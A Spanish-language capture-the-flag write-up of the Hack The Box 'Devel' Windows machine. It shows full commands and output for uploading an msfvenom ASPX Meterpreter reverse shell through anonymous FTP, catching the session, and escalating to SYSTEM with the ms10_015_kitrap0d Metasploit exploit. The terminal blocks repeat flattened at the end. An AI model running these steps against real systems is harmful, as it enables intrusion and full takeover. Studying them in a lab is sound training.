Devel

Dificultad: Easy - OS: Windows

¯\_( ͡° ͜ʖ ͡°)_/¯ Machine info

La máquina Devel es un desafío de nivel introductorio orientado a demostrar los riesgos de configuraciones por defecto en sistemas Windows. A través de una fase de reconocimiento básica, se identifican dos vectores principales: un servidor FTP de Microsoft y un servidor web IIS corriendo en el mismo equipo. El acceso anónimo habilitado en el FTP, junto con permisos de escritura en el directorio público del servidor web, permiten al atacante cargar archivos ejecutables, lo que se convierte en el punto de entrada clave para la explotación remota.

Mediante la carga de una reverse shell en formato ASPX, se establece una sesión Meterpreter que permite la ejecución remota de comandos. Una vez dentro del sistema, el objetivo pasa a ser la escalada de privilegios. Debido a que la máquina está basada en una arquitectura de 32 bits, se aprovechan módulos locales de Metasploit, en particular el exploit ms10_015_kitrap0d, que resulta exitoso para elevar los privilegios hasta el nivel de administrador.

Este reto pone en evidencia la importancia de la correcta configuración de servicios expuestos a la red, así como también destaca el valor de herramientas automatizadas para la explotación y post-explotación en entornos Windows.

Enumeración de puertos/servicios

┌──(root㉿kali)-[/home/kali/Documents/HTB]
└─# nmap -sCV --open -T4 -v -n 10.10.10.5

📌 Parámetros

sCV:
- -sC → Ejecuta scripts de detección predeterminados → Usa los scripts de nmap ubicados en /usr/share/nmap/scripts/, los cuales buscan información adicional en los puertos abiertos.
- -sV → Detección de versiones → Intenta identificar el software y su versión en los puertos abiertos.

-n → No resuelve nombres de dominio (reduce el tiempo del escaneo).

--open → Muestra solo puertos abiertos → Filtra la salida para no mostrar puertos cerrados o filtrados.

-T4 → Ajusta la velocidad del escaneo → T4 es un nivel "agresivo" que acelera el escaneo, útil en redes rápidas.

-v → Modo verbose → Muestra más detalles sobre el progreso del escaneo.

Resultado:

PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  02:06AM       <DIR>          aspnet_client
| 04-30-25  06:46AM                 2943 exp.aspx
| 03-17-17  05:37PM                  689 iisstart.htm
|_03-17-17  05:37PM               184946 welcome.png
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp open  http    Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-title: IIS7
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

De entrada vemos que nmap pudo acceder como usuario anonymous al puerto 21 (ftp) y listar los recursos que se alojan allí. Y además, el puerto 80 corre un Microsoft-IIS/7.5

Enumeración de archivos y permisos vía FTP

┌──(root㉿kali)-[/home/kali/Documents/HTB/DEVEL]
└─# python3 ftpmap.py 10.10.10.5 anonymous
[+] IP: 10.10.10.5:21           Name: 10.10.10.5                Status: Authenticated

Path                                                         Read       Write      Comment
------------------------------------------------------------ ---------- ---------- --------------------
/aspnet_client/                                              -          -          FTP directory
/aspnet_client/system_web/                                   -          -          FTP directory
/aspnet_client/system_web/2_0_50727/                         -          -          FTP directory
/exp.aspx                                                    YES        -          FTP file
/iisstart.htm                                                YES        -          FTP file
/welcome.png                                                 YES        -          FTP file

De todos estos recursos que enumero el ftpmap el que nos interesa es el exp.aspx, porque se trata de un archivo ejecutable por IIS (osea codigo ASP.NET) y nos está indicando que podemos subir un ejecutable con esa extensión para levantar una reverse shell. El siguiente paso es setear y crear nuestro payload con msfvenom para obtener nuestra reverse shell

Abuso de configuración débil

┌──(root㉿kali)-[/home/kali/Documents/HTB/DEVEL]
└─# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.7 LPORT=4444 -f aspx -o backdoor.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of aspx file: 2902 bytes
Saved as: backdoor.aspx

Subimos el payload al servidor ftp. Para que el payload se cargue efectivamente tenemos que conectarnos al servidor ftp desde el directorio donde este se encuentra.

ftp> put backdoor.aspx
local: backdoor.aspx remote: backdoor.aspx
229 Entering Extended Passive Mode (|||49201|)
125 Data connection already open; Transfer starting.
100% |**********************************************************|  2942        3.40 MiB/s    --:-- ETA
226 Transfer complete.
2942 bytes sent in 00:00 (12.39 KiB/s)

Ejecución remota de comandos (RCE)

Una vez que subimos el payload solo tenemos que levantar el listener en msfconsole y ejecutar el payload desde la url del servidor web (http://10.10.10.5/backdoor.aspx)

msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lport 4444
lport => 4444
msf6 exploit(multi/handler) > set lhost 10.10.14.7
lhost => 10.10.14.7
msf6 exploit(multi/handler) > options

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process,
                                         none)
   LHOST     10.10.14.7       yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

View the full module info with the info, or info -d command.

msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.14.7:4444 
[*] Sending stage (177734 bytes) to 10.10.10.5
[*] Meterpreter session 11 opened (10.10.14.7:4444 -> 10.10.10.5:49217) at 2025-05-02 01:50:36 -0400

meterpreter >

Post-explotación y reconocimiento interno

Para la escalada de privilegios seleccionaremos el módulo post/multi/recon/local_exploit_suggester que se encarga de buscar aquellos exploits que puedan ser útiles para esta sesión dentro de la base de datos de msfconsole.

meterpreter > background
[*] Backgrounding session 11...
msf6 exploit(multi/handler) > search suggester

Matching Modules
================

   #  Name                                      Disclosure Date  Rank    Check  Description
   -  ----                                      ---------------  ----    -----  -----------
   0  post/multi/recon/local_exploit_suggester  .                normal  No     Multi Recon Local Exploit Suggester


Interact with a module by name or index. For example info 0, use 0 or use post/multi/recon/local_exploit_suggester                                                                        

msf6 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > show options

Module options (post/multi/recon/local_exploit_suggester):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   SESSION                           yes       The session to run this module on
   SHOWDESCRIPTION  false            yes       Displays a detailed description for the avai
                                               lable exploits

msf6 post(multi/recon/local_exploit_suggester) > set session 11
session => 11
msf6 post(multi/recon/local_exploit_suggester) > run
[*] 10.10.10.5 - Collecting local exploits for x86/windows...
/usr/share/metasploit-framework/vendor/bundle/ruby/3.3.0/gems/logging-2.4.0/lib/logging.rb:10: warning: /usr/lib/x86_64-linux-gnu/ruby/3.3.0/syslog.so was loaded from the standard library, but will no longer be part of the default gems starting from Ruby 3.4.0.
You can add syslog to your Gemfile or gemspec to silence this warning.
Also please contact the author of logging-2.4.0 to request adding syslog into its gemspec.
[*] 10.10.10.5 - 204 exploit checks are being tried...
[+] 10.10.10.5 - exploit/windows/local/bypassuac_comhijack: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move: The service is running, but could not be validated. Vulnerable Windows 7/Windows Server 2008 R2 build detected!
[+] 10.10.10.5 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms10_092_schelevator: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms15_004_tswbproxy: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ntusermndragover: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Running check method for exploit 42 / 42
[*] 10.10.10.5 - Valid modules for session 11:
=============================

 #   Name                                                           Potentially Vulnerable?  Check Result
 -   ----                                                           -----------------------  ------------
 1   exploit/windows/local/bypassuac_comhijack                      Yes                      The target appears to be vulnerable.                                                         
 2   exploit/windows/local/bypassuac_eventvwr                       Yes                      The target appears to be vulnerable.                                                         
 3   exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move   Yes                      The service is running, but could not be validated. Vulnerable Windows 7/Windows Server 2008 R2 build detected!                                                                           
 4   exploit/windows/local/ms10_015_kitrap0d                        Yes                      The service is running, but could not be validated.                                          
 5   exploit/windows/local/ms10_092_schelevator                     Yes                      The service is running, but could not be validated.                                          
 6   exploit/windows/local/ms13_053_schlamperei                     Yes                      The target appears to be vulnerable.                                                         
 7   exploit/windows/local/ms13_081_track_popup_menu                Yes                      The target appears to be vulnerable.                                                         
 8   exploit/windows/local/ms14_058_track_popup_menu                Yes                      The target appears to be vulnerable.                                                         
 9   exploit/windows/local/ms15_004_tswbproxy                       Yes                      The service is running, but could not be validated.                                          
 10  exploit/windows/local/ms15_051_client_copy_image               Yes                      The target appears to be vulnerable.                                                         
 11  exploit/windows/local/ms16_016_webdav                          Yes                      The service is running, but could not be validated.                                          
 12  exploit/windows/local/ms16_032_secondary_logon_handle_privesc  Yes                      The service is running, but could not be validated.                                          
 13  exploit/windows/local/ms16_075_reflection                      Yes                      The target appears to be vulnerable.                                                         
 14  exploit/windows/local/ms16_075_reflection_juicy                Yes                      The target appears to be vulnerable.                                                         
 15  exploit/windows/local/ntusermndragover                         Yes                      The target appears to be vulnerable.                                                         
 16  exploit/windows/local/ppr_flatten_rec                          Yes                      The target appears to be vulnerable.

Escalada de privilegios local

El exploit que nos servirá para este caso es el exploit/windows/local/ms10_015_kitrap0d y lo único que debemos setear es el lhost y la sesión de meterpreter donde tenemos la reverse shell activa.

msf6 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms10_015_kitrap0d
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/ms10_015_kitrap0d) > set lhost 10.10.14.7
lhost => 10.10.14.7
msf6 exploit(windows/local/ms10_015_kitrap0d) > set session 11
session => 11
msf6 exploit(windows/local/ms10_015_kitrap0d) > run
[*] Started reverse TCP handler on 10.10.14.7:4444 
[*] Reflectively injecting payload and triggering the bug...
[*] Launching msiexec to host the DLL...
[+] Process 2788 launched.
[*] Reflectively injecting the DLL into 2788...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (177734 bytes) to 10.10.10.5
[*] Meterpreter session 12 opened (10.10.14.7:4444 -> 10.10.10.5:49218) at 2025-05-02 02:01:23 -0400

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
Process 2080 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

c:\windows\system32\inetsrv>type \Users\babis\Desktop\user.txt
type \Users\babis\Desktop\user.txt
7f47****************************

c:\windows\system32\inetsrv>type \Users\Administrator\Desktop\root.txt
type \Users\Administrator\Desktop\root.txt
7cb3****************************

Por último nos llevamos las flags ( ͡° ͜ʖ ͡°)

Last updated 10 days ago

┌──(root㉿kali)-[/home/kali/Documents/HTB/DEVEL] └─# python3 ftpmap.py 10.10.10.5 anonymous [+] IP: 10.10.10.5:21 Name: 10.10.10.5 Status: Authenticated Path Read Write Comment ------------------------------------------------------------ ---------- ---------- -------------------- /aspnet_client/ - - FTP directory /aspnet_client/system_web/ - - FTP directory /aspnet_client/system_web/2_0_50727/ - - FTP directory /exp.aspx YES - FTP file /iisstart.htm YES - FTP file /welcome.png YES - FTP file

┌──(root㉿kali)-[/home/kali/Documents/HTB/DEVEL] └─# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.7 LPORT=4444 -f aspx -o backdoor.aspx [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x86 from the payload No encoder specified, outputting raw payload Payload size: 354 bytes Final size of aspx file: 2902 bytes Saved as: backdoor.aspx

ftp> put backdoor.aspx local: backdoor.aspx remote: backdoor.aspx 229 Entering Extended Passive Mode (|||49201|) 125 Data connection already open; Transfer starting. 100% |**********************************************************| 2942 3.40 MiB/s --:-- ETA 226 Transfer complete. 2942 bytes sent in 00:00 (12.39 KiB/s)

msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf6 exploit(multi/handler) > set lport 4444 lport => 4444 msf6 exploit(multi/handler) > set lhost 10.10.14.7 lhost => 10.10.14.7 msf6 exploit(multi/handler) > options Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 10.10.14.7 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Wildcard Target View the full module info with the info, or info -d command. msf6 exploit(multi/handler) > run [*] Started reverse TCP handler on 10.10.14.7:4444 [*] Sending stage (177734 bytes) to 10.10.10.5 [*] Meterpreter session 11 opened (10.10.14.7:4444 -> 10.10.10.5:49217) at 2025-05-02 01:50:36 -0400 meterpreter >

meterpreter > background [*] Backgrounding session 11... msf6 exploit(multi/handler) > search suggester Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 post/multi/recon/local_exploit_suggester . normal No Multi Recon Local Exploit Suggester Interact with a module by name or index. For example info 0, use 0 or use post/multi/recon/local_exploit_suggester msf6 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester msf6 post(multi/recon/local_exploit_suggester) > show options Module options (post/multi/recon/local_exploit_suggester): Name Current Setting Required Description ---- --------------- -------- ----------- SESSION yes The session to run this module on SHOWDESCRIPTION false yes Displays a detailed description for the avai lable exploits msf6 post(multi/recon/local_exploit_suggester) > set session 11 session => 11 msf6 post(multi/recon/local_exploit_suggester) > run [*] 10.10.10.5 - Collecting local exploits for x86/windows... /usr/share/metasploit-framework/vendor/bundle/ruby/3.3.0/gems/logging-2.4.0/lib/logging.rb:10: warning: /usr/lib/x86_64-linux-gnu/ruby/3.3.0/syslog.so was loaded from the standard library, but will no longer be part of the default gems starting from Ruby 3.4.0. You can add syslog to your Gemfile or gemspec to silence this warning. Also please contact the author of logging-2.4.0 to request adding syslog into its gemspec. [*] 10.10.10.5 - 204 exploit checks are being tried... [+] 10.10.10.5 - exploit/windows/local/bypassuac_comhijack: The target appears to be vulnerable. [+] 10.10.10.5 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable. [+] 10.10.10.5 - exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move: The service is running, but could not be validated. Vulnerable Windows 7/Windows Server 2008 R2 build detected! [+] 10.10.10.5 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated. [+] 10.10.10.5 - exploit/windows/local/ms10_092_schelevator: The service is running, but could not be validated. [+] 10.10.10.5 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable. [+] 10.10.10.5 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable. [+] 10.10.10.5 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable. [+] 10.10.10.5 - exploit/windows/local/ms15_004_tswbproxy: The service is running, but could not be validated. [+] 10.10.10.5 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable. [+] 10.10.10.5 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated. [+] 10.10.10.5 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated. [+] 10.10.10.5 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable. [+] 10.10.10.5 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable. [+] 10.10.10.5 - exploit/windows/local/ntusermndragover: The target appears to be vulnerable. [+] 10.10.10.5 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable. [*] Running check method for exploit 42 / 42 [*] 10.10.10.5 - Valid modules for session 11: ============================= # Name Potentially Vulnerable? Check Result - ---- ----------------------- ------------ 1 exploit/windows/local/bypassuac_comhijack Yes The target appears to be vulnerable. 2 exploit/windows/local/bypassuac_eventvwr Yes The target appears to be vulnerable. 3 exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move Yes The service is running, but could not be validated. Vulnerable Windows 7/Windows Server 2008 R2 build detected! 4 exploit/windows/local/ms10_015_kitrap0d Yes The service is running, but could not be validated. 5 exploit/windows/local/ms10_092_schelevator Yes The service is running, but could not be validated. 6 exploit/windows/local/ms13_053_schlamperei Yes The target appears to be vulnerable. 7 exploit/windows/local/ms13_081_track_popup_menu Yes The target appears to be vulnerable. 8 exploit/windows/local/ms14_058_track_popup_menu Yes The target appears to be vulnerable. 9 exploit/windows/local/ms15_004_tswbproxy Yes The service is running, but could not be validated. 10 exploit/windows/local/ms15_051_client_copy_image Yes The target appears to be vulnerable. 11 exploit/windows/local/ms16_016_webdav Yes The service is running, but could not be validated. 12 exploit/windows/local/ms16_032_secondary_logon_handle_privesc Yes The service is running, but could not be validated. 13 exploit/windows/local/ms16_075_reflection Yes The target appears to be vulnerable. 14 exploit/windows/local/ms16_075_reflection_juicy Yes The target appears to be vulnerable. 15 exploit/windows/local/ntusermndragover Yes The target appears to be vulnerable. 16 exploit/windows/local/ppr_flatten_rec Yes The target appears to be vulnerable.

msf6 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms10_015_kitrap0d [*] No payload configured, defaulting to windows/meterpreter/reverse_tcp msf6 exploit(windows/local/ms10_015_kitrap0d) > set lhost 10.10.14.7 lhost => 10.10.14.7 msf6 exploit(windows/local/ms10_015_kitrap0d) > set session 11 session => 11 msf6 exploit(windows/local/ms10_015_kitrap0d) > run [*] Started reverse TCP handler on 10.10.14.7:4444 [*] Reflectively injecting payload and triggering the bug... [*] Launching msiexec to host the DLL... [+] Process 2788 launched. [*] Reflectively injecting the DLL into 2788... [+] Exploit finished, wait for (hopefully privileged) payload execution to complete. [*] Sending stage (177734 bytes) to 10.10.10.5 [*] Meterpreter session 12 opened (10.10.14.7:4444 -> 10.10.10.5:49218) at 2025-05-02 02:01:23 -0400 meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter > shell Process 2080 created. Channel 1 created. Microsoft Windows [Version 6.1.7600] Copyright (c) 2009 Microsoft Corporation. All rights reserved. c:\windows\system32\inetsrv>type \Users\babis\Desktop\user.txt type \Users\babis\Desktop\user.txt 7f47**************************** c:\windows\system32\inetsrv>type \Users\Administrator\Desktop\root.txt type \Users\Administrator\Desktop\root.txt 7cb3****************************